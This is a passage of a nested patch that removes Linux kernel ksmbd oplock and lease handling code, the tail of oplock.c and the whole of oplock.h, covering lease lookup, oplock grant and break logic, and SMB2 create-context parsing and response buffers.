+-{
+-	struct oplock_info *opinfo;
+-	int err = 0;
+-	struct lease_table *lb;
+-
+-	if (!lctx)
+-		return err;
+-
+-	read_lock(&lease_list_lock);
+-	if (list_empty(&lease_table_list)) {
+-		read_unlock(&lease_list_lock);
+-		return 0;
+-	}
+-
+-	list_for_each_entry(lb, &lease_table_list, l_entry) {
+-		if (!memcmp(lb->client_guid, sess->ClientGUID,
+-			    SMB2_CLIENT_GUID_SIZE))
+-			goto found;
+-	}
+-	read_unlock(&lease_list_lock);
+-
+-	return 0;
+-
+-found:
+-	rcu_read_lock();
+-	list_for_each_entry_rcu(opinfo, &lb->lease_list, lease_entry) {
+-		if (!atomic_inc_not_zero(&opinfo->refcount))
+-			continue;
+-		rcu_read_unlock();
+-		if (opinfo->o_fp->f_ci == ci)
+-			goto op_next;
+-		err = compare_guid_key(opinfo, sess->ClientGUID,
+-				       lctx->lease_key);
+-		if (err) {
+-			err = -EINVAL;
+-			ksmbd_debug(OPLOCK,
+-				    "found same lease key is already used in other files\n");
+-			opinfo_put(opinfo);
+-			goto out;
+-		}
+-op_next:
+-		opinfo_put(opinfo);
+-		rcu_read_lock();
+-	}
+-	rcu_read_unlock();
+-
+-out:
+-	read_unlock(&lease_list_lock);
+-	return err;
+-}
+-
+-static void copy_lease(struct oplock_info *op1, struct oplock_info *op2)
+-{
+-	struct lease *lease1 = op1->o_lease;
+-	struct lease *lease2 = op2->o_lease;
+-
+-	op2->level = op1->level;
+-	lease2->state = lease1->state;
+-	memcpy(lease2->lease_key, lease1->lease_key,
+-	       SMB2_LEASE_KEY_SIZE);
+-	lease2->duration = lease1->duration;
+-	lease2->flags = lease1->flags;
+-}
+-
+-static int add_lease_global_list(struct oplock_info *opinfo)
+-{
+-	struct lease_table *lb;
+-
+-	read_lock(&lease_list_lock);
+-	list_for_each_entry(lb, &lease_table_list, l_entry) {
+-		if (!memcmp(lb->client_guid, opinfo->conn->ClientGUID,
+-			    SMB2_CLIENT_GUID_SIZE)) {
+-			opinfo->o_lease->l_lb = lb;
+-			lease_add_list(opinfo);
+-			read_unlock(&lease_list_lock);
+-			return 0;
+-		}
+-	}
+-	read_unlock(&lease_list_lock);
+-
+-	lb = kmalloc(sizeof(struct lease_table), GFP_KERNEL);
+-	if (!lb)
+-		return -ENOMEM;
+-
+-	memcpy(lb->client_guid, opinfo->conn->ClientGUID,
+-	       SMB2_CLIENT_GUID_SIZE);
+-	INIT_LIST_HEAD(&lb->lease_list);
+-	spin_lock_init(&lb->lb_lock);
+-	opinfo->o_lease->l_lb = lb;
+-	lease_add_list(opinfo);
+-	lb_add(lb);
+-	return 0;
+-}
+-
+-static void set_oplock_level(struct oplock_info *opinfo, int level,
+-			     struct lease_ctx_info *lctx)
+-{
+-	switch (level) {
+-	case SMB2_OPLOCK_LEVEL_BATCH:
+-	case SMB2_OPLOCK_LEVEL_EXCLUSIVE:
+-		grant_write_oplock(opinfo, level, lctx);
+-		break;
+-	case SMB2_OPLOCK_LEVEL_II:
+-		grant_read_oplock(opinfo, lctx);
+-		break;
+-	default:
+-		grant_none_oplock(opinfo, lctx);
+-		break;
+-	}
+-}
+-
+-/**
+- * smb_grant_oplock() - handle oplock/lease request on file open
+- * @work:		smb work
+- * @req_op_level:	oplock level
+- * @pid:		id of open file
+- * @fp:			ksmbd file pointer
+- * @tid:		Tree id of connection
+- * @lctx:		lease context information on file open
+- * @share_ret:		share mode
+- *
+- * Return:      0 on success, otherwise error
+- */
+-int smb_grant_oplock(struct ksmbd_work *work, int req_op_level, u64 pid,
+-		     struct ksmbd_file *fp, __u16 tid,
+-		     struct lease_ctx_info *lctx, int share_ret)
+-{
+-	struct ksmbd_session *sess = work->sess;
+-	int err = 0;
+-	struct oplock_info *opinfo = NULL, *prev_opinfo = NULL;
+-	struct ksmbd_inode *ci = fp->f_ci;
+-	bool prev_op_has_lease;
+-	__le32 prev_op_state = 0;
+-
+-	/* not support directory lease */
+-	if (S_ISDIR(file_inode(fp->filp)->i_mode))
+-		return 0;
+-
+-	opinfo = alloc_opinfo(work, pid, tid);
+-	if (!opinfo)
+-		return -ENOMEM;
+-
+-	if (lctx) {
+-		err = alloc_lease(opinfo, lctx);
+-		if (err)
+-			goto err_out;
+-		opinfo->is_lease = 1;
+-	}
+-
+-	/* ci does not have any oplock */
+-	if (!opinfo_count(fp))
+-		goto set_lev;
+-
+-	/* grant none-oplock if second open is trunc */
+-	if (fp->attrib_only && fp->cdoption != FILE_OVERWRITE_IF_LE &&
+-	    fp->cdoption != FILE_OVERWRITE_LE &&
+-	    fp->cdoption != FILE_SUPERSEDE_LE) {
+-		req_op_level = SMB2_OPLOCK_LEVEL_NONE;
+-		goto set_lev;
+-	}
+-
+-	if (lctx) {
+-		struct oplock_info *m_opinfo;
+-
+-		/* is lease already granted ? */
+-		m_opinfo = same_client_has_lease(ci, sess->ClientGUID,
+-						 lctx);
+-		if (m_opinfo) {
+-			copy_lease(m_opinfo, opinfo);
+-			if (atomic_read(&m_opinfo->breaking_cnt))
+-				opinfo->o_lease->flags =
+-					SMB2_LEASE_FLAG_BREAK_IN_PROGRESS_LE;
+-			goto out;
+-		}
+-	}
+-	prev_opinfo = opinfo_get_list(ci);
+-	if (!prev_opinfo ||
+-	    (prev_opinfo->level == SMB2_OPLOCK_LEVEL_NONE && lctx)) {
+-		opinfo_conn_put(prev_opinfo);
+-		goto set_lev;
+-	}
+-	prev_op_has_lease = prev_opinfo->is_lease;
+-	if (prev_op_has_lease)
+-		prev_op_state = prev_opinfo->o_lease->state;
+-
+-	if (share_ret < 0 &&
+-	    prev_opinfo->level == SMB2_OPLOCK_LEVEL_EXCLUSIVE) {
+-		err = share_ret;
+-		opinfo_conn_put(prev_opinfo);
+-		goto err_out;
+-	}
+-
+-	if (prev_opinfo->level != SMB2_OPLOCK_LEVEL_BATCH &&
+-	    prev_opinfo->level != SMB2_OPLOCK_LEVEL_EXCLUSIVE) {
+-		opinfo_conn_put(prev_opinfo);
+-		goto op_break_not_needed;
+-	}
+-
+-	list_add(&work->interim_entry, &prev_opinfo->interim_list);
+-	err = oplock_break(prev_opinfo, SMB2_OPLOCK_LEVEL_II);
+-	opinfo_conn_put(prev_opinfo);
+-	if (err == -ENOENT)
+-		goto set_lev;
+-	/* Check all oplock was freed by close */
+-	else if (err < 0)
+-		goto err_out;
+-
+-op_break_not_needed:
+-	if (share_ret < 0) {
+-		err = share_ret;
+-		goto err_out;
+-	}
+-
+-	if (req_op_level != SMB2_OPLOCK_LEVEL_NONE)
+-		req_op_level = SMB2_OPLOCK_LEVEL_II;
+-
+-	/* grant fixed oplock on stacked locking between lease and oplock */
+-	if (prev_op_has_lease && !lctx)
+-		if (prev_op_state & SMB2_LEASE_HANDLE_CACHING_LE)
+-			req_op_level = SMB2_OPLOCK_LEVEL_NONE;
+-
+-	if (!prev_op_has_lease && lctx) {
+-		req_op_level = SMB2_OPLOCK_LEVEL_II;
+-		lctx->req_state = SMB2_LEASE_READ_CACHING_LE;
+-	}
+-
+-set_lev:
+-	set_oplock_level(opinfo, req_op_level, lctx);
+-
+-out:
+-	rcu_assign_pointer(fp->f_opinfo, opinfo);
+-	opinfo->o_fp = fp;
+-
+-	opinfo_count_inc(fp);
+-	opinfo_add(opinfo);
+-	if (opinfo->is_lease) {
+-		err = add_lease_global_list(opinfo);
+-		if (err)
+-			goto err_out;
+-	}
+-
+-	return 0;
+-err_out:
+-	free_opinfo(opinfo);
+-	return err;
+-}
+-
+-/**
+- * smb_break_all_write_oplock() - break batch/exclusive oplock to level2
+- * @work:	smb work
+- * @fp:		ksmbd file pointer
+- * @is_trunc:	truncate on open
+- */
+-static void smb_break_all_write_oplock(struct ksmbd_work *work,
+-				       struct ksmbd_file *fp, int is_trunc)
+-{
+-	struct oplock_info *brk_opinfo;
+-
+-	brk_opinfo = opinfo_get_list(fp->f_ci);
+-	if (!brk_opinfo)
+-		return;
+-	if (brk_opinfo->level != SMB2_OPLOCK_LEVEL_BATCH &&
+-	    brk_opinfo->level != SMB2_OPLOCK_LEVEL_EXCLUSIVE) {
+-		opinfo_conn_put(brk_opinfo);
+-		return;
+-	}
+-
+-	brk_opinfo->open_trunc = is_trunc;
+-	list_add(&work->interim_entry, &brk_opinfo->interim_list);
+-	oplock_break(brk_opinfo, SMB2_OPLOCK_LEVEL_II);
+-	opinfo_conn_put(brk_opinfo);
+-}
+-
+-/**
+- * smb_break_all_levII_oplock() - send level2 oplock or read lease break command
+- *	from server to client
+- * @work:	smb work
+- * @fp:		ksmbd file pointer
+- * @is_trunc:	truncate on open
+- */
+-void smb_break_all_levII_oplock(struct ksmbd_work *work, struct ksmbd_file *fp,
+-				int is_trunc)
+-{
+-	struct oplock_info *op, *brk_op;
+-	struct ksmbd_inode *ci;
+-	struct ksmbd_conn *conn = work->conn;
+-
+-	if (!test_share_config_flag(work->tcon->share_conf,
+-				    KSMBD_SHARE_FLAG_OPLOCKS))
+-		return;
+-
+-	ci = fp->f_ci;
+-	op = opinfo_get(fp);
+-
+-	rcu_read_lock();
+-	list_for_each_entry_rcu(brk_op, &ci->m_op_list, op_entry) {
+-		if (!atomic_inc_not_zero(&brk_op->refcount))
+-			continue;
+-
+-		atomic_inc(&brk_op->conn->r_count);
+-		if (ksmbd_conn_releasing(brk_op->conn)) {
+-			atomic_dec(&brk_op->conn->r_count);
+-			continue;
+-		}
+-
+-		rcu_read_unlock();
+-		if (brk_op->is_lease && (brk_op->o_lease->state &
+-		    (~(SMB2_LEASE_READ_CACHING_LE |
+-				SMB2_LEASE_HANDLE_CACHING_LE)))) {
+-			ksmbd_debug(OPLOCK, "unexpected lease state(0x%x)\n",
+-				    brk_op->o_lease->state);
+-			goto next;
+-		} else if (brk_op->level !=
+-				SMB2_OPLOCK_LEVEL_II) {
+-			ksmbd_debug(OPLOCK, "unexpected oplock(0x%x)\n",
+-				    brk_op->level);
+-			goto next;
+-		}
+-
+-		/* Skip oplock being break to none */
+-		if (brk_op->is_lease &&
+-		    brk_op->o_lease->new_state == SMB2_LEASE_NONE_LE &&
+-		    atomic_read(&brk_op->breaking_cnt))
+-			goto next;
+-
+-		if (op && op->is_lease && brk_op->is_lease &&
+-		    !memcmp(conn->ClientGUID, brk_op->conn->ClientGUID,
+-			    SMB2_CLIENT_GUID_SIZE) &&
+-		    !memcmp(op->o_lease->lease_key, brk_op->o_lease->lease_key,
+-			    SMB2_LEASE_KEY_SIZE))
+-			goto next;
+-		brk_op->open_trunc = is_trunc;
+-		oplock_break(brk_op, SMB2_OPLOCK_LEVEL_NONE);
+-next:
+-		opinfo_conn_put(brk_op);
+-		rcu_read_lock();
+-	}
+-	rcu_read_unlock();
+-
+-	if (op)
+-		opinfo_put(op);
+-}
+-
+-/**
+- * smb_break_all_oplock() - break both batch/exclusive and level2 oplock
+- * @work:	smb work
+- * @fp:		ksmbd file pointer
+- */
+-void smb_break_all_oplock(struct ksmbd_work *work, struct ksmbd_file *fp)
+-{
+-	if (!test_share_config_flag(work->tcon->share_conf,
+-				    KSMBD_SHARE_FLAG_OPLOCKS))
+-		return;
+-
+-	smb_break_all_write_oplock(work, fp, 1);
+-	smb_break_all_levII_oplock(work, fp, 1);
+-}
+-
+-/**
+- * smb2_map_lease_to_oplock() - map lease state to corresponding oplock type
+- * @lease_state:     lease type
+- *
+- * Return:      0 if no mapping, otherwise corresponding oplock type
+- */
+-__u8 smb2_map_lease_to_oplock(__le32 lease_state)
+-{
+-	if (lease_state == (SMB2_LEASE_HANDLE_CACHING_LE |
+-			    SMB2_LEASE_READ_CACHING_LE |
+-			    SMB2_LEASE_WRITE_CACHING_LE)) {
+-		return SMB2_OPLOCK_LEVEL_BATCH;
+-	} else if (lease_state != SMB2_LEASE_WRITE_CACHING_LE &&
+-		 lease_state & SMB2_LEASE_WRITE_CACHING_LE) {
+-		if (!(lease_state & SMB2_LEASE_HANDLE_CACHING_LE))
+-			return SMB2_OPLOCK_LEVEL_EXCLUSIVE;
+-	} else if (lease_state & SMB2_LEASE_READ_CACHING_LE) {
+-		return SMB2_OPLOCK_LEVEL_II;
+-	}
+-	return 0;
+-}
+-
+-/**
+- * create_lease_buf() - create lease context for open cmd response
+- * @rbuf:	buffer to create lease context response
+- * @lease:	buffer to stored parsed lease state information
+- */
+-void create_lease_buf(u8 *rbuf, struct lease *lease)
+-{
+-	if (lease->version == 2) {
+-		struct create_lease_v2 *buf = (struct create_lease_v2 *)rbuf;
+-
+-		memset(buf, 0, sizeof(struct create_lease_v2));
+-		memcpy(buf->lcontext.LeaseKey, lease->lease_key,
+-		       SMB2_LEASE_KEY_SIZE);
+-		buf->lcontext.LeaseFlags = lease->flags;
+-		buf->lcontext.LeaseState = lease->state;
+-		memcpy(buf->lcontext.ParentLeaseKey, lease->parent_lease_key,
+-		       SMB2_LEASE_KEY_SIZE);
+-		buf->ccontext.DataOffset = cpu_to_le16(offsetof
+-				(struct create_lease_v2, lcontext));
+-		buf->ccontext.DataLength = cpu_to_le32(sizeof(struct lease_context_v2));
+-		buf->ccontext.NameOffset = cpu_to_le16(offsetof
+-				(struct create_lease_v2, Name));
+-		buf->ccontext.NameLength = cpu_to_le16(4);
+-		buf->Name[0] = 'R';
+-		buf->Name[1] = 'q';
+-		buf->Name[2] = 'L';
+-		buf->Name[3] = 's';
+-	} else {
+-		struct create_lease *buf = (struct create_lease *)rbuf;
+-
+-		memset(buf, 0, sizeof(struct create_lease));
+-		memcpy(buf->lcontext.LeaseKey, lease->lease_key, SMB2_LEASE_KEY_SIZE);
+-		buf->lcontext.LeaseFlags = lease->flags;
+-		buf->lcontext.LeaseState = lease->state;
+-		buf->ccontext.DataOffset = cpu_to_le16(offsetof
+-				(struct create_lease, lcontext));
+-		buf->ccontext.DataLength = cpu_to_le32(sizeof(struct lease_context));
+-		buf->ccontext.NameOffset = cpu_to_le16(offsetof
+-				(struct create_lease, Name));
+-		buf->ccontext.NameLength = cpu_to_le16(4);
+-		buf->Name[0] = 'R';
+-		buf->Name[1] = 'q';
+-		buf->Name[2] = 'L';
+-		buf->Name[3] = 's';
+-	}
+-}
+-
+-/**
+- * parse_lease_state() - parse lease context containted in file open request
+- * @open_req:	buffer containing smb2 file open(create) request
+- *
+- * Return:  oplock state, -ENOENT if create lease context not found
+- */
+-struct lease_ctx_info *parse_lease_state(void *open_req)
+-{
+-	struct create_context *cc;
+-	struct smb2_create_req *req = (struct smb2_create_req *)open_req;
+-	struct lease_ctx_info *lreq;
+-
+-	cc = smb2_find_context_vals(req, SMB2_CREATE_REQUEST_LEASE, 4);
+-	if (IS_ERR_OR_NULL(cc))
+-		return NULL;
+-
+-	lreq = kzalloc(sizeof(struct lease_ctx_info), GFP_KERNEL);
+-	if (!lreq)
+-		return NULL;
+-
+-	if (sizeof(struct lease_context_v2) == le32_to_cpu(cc->DataLength)) {
+-		struct create_lease_v2 *lc = (struct create_lease_v2 *)cc;
+-
+-		memcpy(lreq->lease_key, lc->lcontext.LeaseKey, SMB2_LEASE_KEY_SIZE);
+-		lreq->req_state = lc->lcontext.LeaseState;
+-		lreq->flags = lc->lcontext.LeaseFlags;
+-		lreq->duration = lc->lcontext.LeaseDuration;
+-		memcpy(lreq->parent_lease_key, lc->lcontext.ParentLeaseKey,
+-				SMB2_LEASE_KEY_SIZE);
+-		lreq->version = 2;
+-	} else {
+-		struct create_lease *lc = (struct create_lease *)cc;
+-
+-		memcpy(lreq->lease_key, lc->lcontext.LeaseKey, SMB2_LEASE_KEY_SIZE);
+-		lreq->req_state = lc->lcontext.LeaseState;
+-		lreq->flags = lc->lcontext.LeaseFlags;
+-		lreq->duration = lc->lcontext.LeaseDuration;
+-		lreq->version = 1;
+-	}
+-	return lreq;
+-}
+-
+-/**
+- * smb2_find_context_vals() - find a particular context info in open request
+- * @open_req:	buffer containing smb2 file open(create) request
+- * @tag:	context name to search for
+- * @tag_len:	the length of tag
+- *
+- * Return:	pointer to requested context, NULL if @str context not found
+- *		or error pointer if name length is invalid.
+- */
+-struct create_context *smb2_find_context_vals(void *open_req, const char *tag, int tag_len)
+-{
+-	struct create_context *cc;
+-	unsigned int next = 0;
+-	char *name;
+-	struct smb2_create_req *req = (struct smb2_create_req *)open_req;
+-	unsigned int remain_len, name_off, name_len, value_off, value_len,
+-		     cc_len;
+-
+-	/*
+-	 * CreateContextsOffset and CreateContextsLength are guaranteed to
+-	 * be valid because of ksmbd_smb2_check_message().
+-	 */
+-	cc = (struct create_context *)((char *)req +
+-				       le32_to_cpu(req->CreateContextsOffset));
+-	remain_len = le32_to_cpu(req->CreateContextsLength);
+-	do {
+-		cc = (struct create_context *)((char *)cc + next);
+-		if (remain_len < offsetof(struct create_context, Buffer))
+-			return ERR_PTR(-EINVAL);
+-
+-		next = le32_to_cpu(cc->Next);
+-		name_off = le16_to_cpu(cc->NameOffset);
+-		name_len = le16_to_cpu(cc->NameLength);
+-		value_off = le16_to_cpu(cc->DataOffset);
+-		value_len = le32_to_cpu(cc->DataLength);
+-		cc_len = next ? next : remain_len;
+-
+-		if ((next & 0x7) != 0 ||
+-		    next > remain_len ||
+-		    name_off != offsetof(struct create_context, Buffer) ||
+-		    name_len < 4 ||
+-		    name_off + name_len > cc_len ||
+-		    (value_off & 0x7) != 0 ||
+-		    (value_off && (value_off < name_off + name_len)) ||
+-		    ((u64)value_off + value_len > cc_len))
+-			return ERR_PTR(-EINVAL);
+-
+-		name = (char *)cc + name_off;
+-		if (name_len == tag_len && !memcmp(name, tag, name_len))
+-			return cc;
+-
+-		remain_len -= next;
+-	} while (next != 0);
+-
+-	return NULL;
+-}
+-
+-/**
+- * create_durable_rsp_buf() - create durable handle context
+- * @cc:	buffer to create durable context response
+- */
+-void create_durable_rsp_buf(char *cc)
+-{
+-	struct create_durable_rsp *buf;
+-
+-	buf = (struct create_durable_rsp *)cc;
+-	memset(buf, 0, sizeof(struct create_durable_rsp));
+-	buf->ccontext.DataOffset = cpu_to_le16(offsetof
+-			(struct create_durable_rsp, Data));
+-	buf->ccontext.DataLength = cpu_to_le32(8);
+-	buf->ccontext.NameOffset = cpu_to_le16(offsetof
+-			(struct create_durable_rsp, Name));
+-	buf->ccontext.NameLength = cpu_to_le16(4);
+-	/* SMB2_CREATE_DURABLE_HANDLE_RESPONSE is "DHnQ" */
+-	buf->Name[0] = 'D';
+-	buf->Name[1] = 'H';
+-	buf->Name[2] = 'n';
+-	buf->Name[3] = 'Q';
+-}
+-
+-/**
+- * create_durable_v2_rsp_buf() - create durable handle v2 context
+- * @cc:	buffer to create durable context response
+- * @fp: ksmbd file pointer
+- */
+-void create_durable_v2_rsp_buf(char *cc, struct ksmbd_file *fp)
+-{
+-	struct create_durable_v2_rsp *buf;
+-
+-	buf = (struct create_durable_v2_rsp *)cc;
+-	memset(buf, 0, sizeof(struct create_durable_rsp));
+-	buf->ccontext.DataOffset = cpu_to_le16(offsetof
+-			(struct create_durable_rsp, Data));
+-	buf->ccontext.DataLength = cpu_to_le32(8);
+-	buf->ccontext.NameOffset = cpu_to_le16(offsetof
+-			(struct create_durable_rsp, Name));
+-	buf->ccontext.NameLength = cpu_to_le16(4);
+-	/* SMB2_CREATE_DURABLE_HANDLE_RESPONSE_V2 is "DH2Q" */
+-	buf->Name[0] = 'D';
+-	buf->Name[1] = 'H';
+-	buf->Name[2] = '2';
+-	buf->Name[3] = 'Q';
+-
+-	buf->Timeout = cpu_to_le32(fp->durable_timeout);
+-}
+-
+-/**
+- * create_mxac_rsp_buf() - create query maximal access context
+- * @cc:			buffer to create maximal access context response
+- * @maximal_access:	maximal access
+- */
+-void create_mxac_rsp_buf(char *cc, int maximal_access)
+-{
+-	struct create_mxac_rsp *buf;
+-
+-	buf = (struct create_mxac_rsp *)cc;
+-	memset(buf, 0, sizeof(struct create_mxac_rsp));
+-	buf->ccontext.DataOffset = cpu_to_le16(offsetof
+-			(struct create_mxac_rsp, QueryStatus));
+-	buf->ccontext.DataLength = cpu_to_le32(8);
+-	buf->ccontext.NameOffset = cpu_to_le16(offsetof
+-			(struct create_mxac_rsp, Name));
+-	buf->ccontext.NameLength = cpu_to_le16(4);
+-	/* SMB2_CREATE_QUERY_MAXIMAL_ACCESS_RESPONSE is "MxAc" */
+-	buf->Name[0] = 'M';
+-	buf->Name[1] = 'x';
+-	buf->Name[2] = 'A';
+-	buf->Name[3] = 'c';
+-
+-	buf->QueryStatus = STATUS_SUCCESS;
+-	buf->MaximalAccess = cpu_to_le32(maximal_access);
+-}
+-
+-void create_disk_id_rsp_buf(char *cc, __u64 file_id, __u64 vol_id)
+-{
+-	struct create_disk_id_rsp *buf;
+-
+-	buf = (struct create_disk_id_rsp *)cc;
+-	memset(buf, 0, sizeof(struct create_disk_id_rsp));
+-	buf->ccontext.DataOffset = cpu_to_le16(offsetof
+-			(struct create_disk_id_rsp, DiskFileId));
+-	buf->ccontext.DataLength = cpu_to_le32(32);
+-	buf->ccontext.NameOffset = cpu_to_le16(offsetof
+-			(struct create_mxac_rsp, Name));
+-	buf->ccontext.NameLength = cpu_to_le16(4);
+-	/* SMB2_CREATE_QUERY_ON_DISK_ID_RESPONSE is "QFid" */
+-	buf->Name[0] = 'Q';
+-	buf->Name[1] = 'F';
+-	buf->Name[2] = 'i';
+-	buf->Name[3] = 'd';
+-
+-	buf->DiskFileId = cpu_to_le64(file_id);
+-	buf->VolumeId = cpu_to_le64(vol_id);
+-}
+-
+-/**
+- * create_posix_rsp_buf() - create posix extension context
+- * @cc:	buffer to create posix on posix response
+- * @fp: ksmbd file pointer
+- */
+-void create_posix_rsp_buf(char *cc, struct ksmbd_file *fp)
+-{
+-	struct create_posix_rsp *buf;
+-	struct inode *inode = file_inode(fp->filp);
+-	struct user_namespace *user_ns = file_mnt_user_ns(fp->filp);
+-	vfsuid_t vfsuid = i_uid_into_vfsuid(user_ns, inode);
+-	vfsgid_t vfsgid = i_gid_into_vfsgid(user_ns, inode);
+-
+-	buf = (struct create_posix_rsp *)cc;
+-	memset(buf, 0, sizeof(struct create_posix_rsp));
+-	buf->ccontext.DataOffset = cpu_to_le16(offsetof
+-			(struct create_posix_rsp, nlink));
+-	/*
+-	 * DataLength = nlink(4) + reparse_tag(4) + mode(4) +
+-	 * domain sid(28) + unix group sid(16).
+-	 */
+-	buf->ccontext.DataLength = cpu_to_le32(56);
+-	buf->ccontext.NameOffset = cpu_to_le16(offsetof
+-			(struct create_posix_rsp, Name));
+-	buf->ccontext.NameLength = cpu_to_le16(POSIX_CTXT_DATA_LEN);
+-	/* SMB2_CREATE_TAG_POSIX is "0x93AD25509CB411E7B42383DE968BCD7C" */
+-	buf->Name[0] = 0x93;
+-	buf->Name[1] = 0xAD;
+-	buf->Name[2] = 0x25;
+-	buf->Name[3] = 0x50;
+-	buf->Name[4] = 0x9C;
+-	buf->Name[5] = 0xB4;
+-	buf->Name[6] = 0x11;
+-	buf->Name[7] = 0xE7;
+-	buf->Name[8] = 0xB4;
+-	buf->Name[9] = 0x23;
+-	buf->Name[10] = 0x83;
+-	buf->Name[11] = 0xDE;
+-	buf->Name[12] = 0x96;
+-	buf->Name[13] = 0x8B;
+-	buf->Name[14] = 0xCD;
+-	buf->Name[15] = 0x7C;
+-
+-	buf->nlink = cpu_to_le32(inode->i_nlink);
+-	buf->reparse_tag = cpu_to_le32(fp->volatile_id);
+-	buf->mode = cpu_to_le32(inode->i_mode & 0777);
+-	/*
+-	 * SidBuffer(44) contain two sids(Domain sid(28), UNIX group sid(16)).
+-	 * Domain sid(28) = revision(1) + num_subauth(1) + authority(6) +
+-	 *		    sub_auth(4 * 4(num_subauth)) + RID(4).
+-	 * UNIX group id(16) = revision(1) + num_subauth(1) + authority(6) +
+-	 *		       sub_auth(4 * 1(num_subauth)) + RID(4).
+-	 */
+-	id_to_sid(from_kuid_munged(&init_user_ns, vfsuid_into_kuid(vfsuid)),
+-		  SIDOWNER, (struct smb_sid *)&buf->SidBuffer[0]);
+-	id_to_sid(from_kgid_munged(&init_user_ns, vfsgid_into_kgid(vfsgid)),
+-		  SIDUNIX_GROUP, (struct smb_sid *)&buf->SidBuffer[28]);
+-}
+-
+-/*
+- * Find lease object(opinfo) for given lease key/fid from lease
+- * break/file close path.
+- */
+-/**
+- * lookup_lease_in_table() - find a matching lease info object
+- * @conn:	connection instance
+- * @lease_key:	lease key to be searched for
+- *
+- * Return:      opinfo if found matching opinfo, otherwise NULL
+- */
+-struct oplock_info *lookup_lease_in_table(struct ksmbd_conn *conn,
+-					  char *lease_key)
+-{
+-	struct oplock_info *opinfo = NULL, *ret_op = NULL;
+-	struct lease_table *lt;
+-	int ret;
+-
+-	read_lock(&lease_list_lock);
+-	list_for_each_entry(lt, &lease_table_list, l_entry) {
+-		if (!memcmp(lt->client_guid, conn->ClientGUID,
+-			    SMB2_CLIENT_GUID_SIZE))
+-			goto found;
+-	}
+-
+-	read_unlock(&lease_list_lock);
+-	return NULL;
+-
+-found:
+-	rcu_read_lock();
+-	list_for_each_entry_rcu(opinfo, &lt->lease_list, lease_entry) {
+-		if (!atomic_inc_not_zero(&opinfo->refcount))
+-			continue;
+-		rcu_read_unlock();
+-		if (!opinfo->op_state || opinfo->op_state == OPLOCK_CLOSING)
+-			goto op_next;
+-		if (!(opinfo->o_lease->state &
+-		      (SMB2_LEASE_HANDLE_CACHING_LE |
+-		       SMB2_LEASE_WRITE_CACHING_LE)))
+-			goto op_next;
+-		ret = compare_guid_key(opinfo, conn->ClientGUID,
+-				       lease_key);
+-		if (ret) {
+-			ksmbd_debug(OPLOCK, "found opinfo\n");
+-			ret_op = opinfo;
+-			goto out;
+-		}
+-op_next:
+-		opinfo_put(opinfo);
+-		rcu_read_lock();
+-	}
+-	rcu_read_unlock();
+-
+-out:
+-	read_unlock(&lease_list_lock);
+-	return ret_op;
+-}
+diff --git a/fs/ksmbd/oplock.h b/fs/ksmbd/oplock.h
+deleted file mode 100644
+index 4b0fe6da76940..0000000000000
+--- a/fs/ksmbd/oplock.h
++++ /dev/null
+@@ -1,127 +0,0 @@
+-/* SPDX-License-Identifier: GPL-2.0-or-later */
+-/*
+- *   Copyright (C) 2016 Namjae Jeon <linkinjeon@kernel.org>
+- *   Copyright (C) 2018 Samsung Electronics Co., Ltd.
+- */
+-
+-#ifndef __KSMBD_OPLOCK_H
+-#define __KSMBD_OPLOCK_H
+-
+-#include "smb_common.h"
+-
+-#define OPLOCK_WAIT_TIME	(35 * HZ)
+-
+-/* SMB2 Oplock levels */
+-#define SMB2_OPLOCK_LEVEL_NONE          0x00
+-#define SMB2_OPLOCK_LEVEL_II            0x01
+-#define SMB2_OPLOCK_LEVEL_EXCLUSIVE     0x08
+-#define SMB2_OPLOCK_LEVEL_BATCH         0x09
+-#define SMB2_OPLOCK_LEVEL_LEASE         0xFF
+-
+-/* Oplock states */
+-#define OPLOCK_STATE_NONE	0x00
+-#define OPLOCK_ACK_WAIT		0x01
+-#define OPLOCK_CLOSING		0x02
+-
+-#define OPLOCK_WRITE_TO_READ		0x01
+-#define OPLOCK_READ_HANDLE_TO_READ	0x02
+-#define OPLOCK_WRITE_TO_NONE		0x04
+-#define OPLOCK_READ_TO_NONE		0x08
+-
+-struct lease_ctx_info {
+-	__u8			lease_key[SMB2_LEASE_KEY_SIZE];
+-	__le32			req_state;
+-	__le32			flags;
+-	__le64			duration;
+-	__u8			parent_lease_key[SMB2_LEASE_KEY_SIZE];
+-	int			version;
+-};
+-
+-struct lease_table {
+-	char			client_guid[SMB2_CLIENT_GUID_SIZE];
+-	struct list_head	lease_list;
+-	struct list_head	l_entry;
+-	spinlock_t		lb_lock;
+-};
+-
+-struct lease {
+-	__u8			lease_key[SMB2_LEASE_KEY_SIZE];
+-	__le32			state;
+-	__le32			new_state;
+-	__le32			flags;
+-	__le64			duration;
+-	__u8			parent_lease_key[SMB2_LEASE_KEY_SIZE];
+-	int			version;
+-	unsigned short		epoch;
+-	struct lease_table	*l_lb;
+-};
+-
+-struct oplock_info {
+-	struct ksmbd_conn	*conn;
+-	struct ksmbd_session	*sess;
+-	struct ksmbd_work	*work;
+-	struct ksmbd_file	*o_fp;
+-	int                     level;
+-	int                     op_state;
+-	unsigned long		pending_break;
+-	u64			fid;
+-	atomic_t		breaking_cnt;
+-	atomic_t		refcount;
+-	__u16                   Tid;
+-	bool			is_lease;
+-	bool			open_trunc;	/* truncate on open */
+-	struct lease		*o_lease;
+-	struct list_head        interim_list;
+-	struct list_head        op_entry;
+-	struct list_head        lease_entry;
+-	wait_queue_head_t oplock_q; /* Other server threads */
+-	wait_queue_head_t oplock_brk; /* oplock breaking wait */
+-	struct rcu_head		rcu_head;
+-};
+-
+-struct lease_break_info {
+-	__le32			curr_state;
+-	__le32			new_state;
+-	__le16			epoch;
+-	char			lease_key[SMB2_LEASE_KEY_SIZE];
+-};
+-
+-struct oplock_break_info {
+-	int level;
+-	int open_trunc;
+-	int fid;
+-};
+-
+-int smb_grant_oplock(struct ksmbd_work *work, int req_op_level,
+-		     u64 pid, struct ksmbd_file *fp, __u16 tid,
+-		     struct lease_ctx_info *lctx, int share_ret);
+-void smb_break_all_levII_oplock(struct ksmbd_work *work,
+-				struct ksmbd_file *fp, int is_trunc);
+-int opinfo_write_to_read(struct oplock_info *opinfo);
+-int opinfo_read_handle_to_read(struct oplock_info *opinfo);
+-int opinfo_write_to_none(struct oplock_info *opinfo);
+-int opinfo_read_to_none(struct oplock_info *opinfo);
+-void close_id_del_oplock(struct ksmbd_file *fp);
+-void smb_break_all_oplock(struct ksmbd_work *work, struct ksmbd_file *fp);
+-struct oplock_info *opinfo_get(struct ksmbd_file *fp);
+-void opinfo_put(struct oplock_info *opinfo);
+-
+-/* Lease related functions */
+-void create_lease_buf(u8 *rbuf, struct lease *lease);
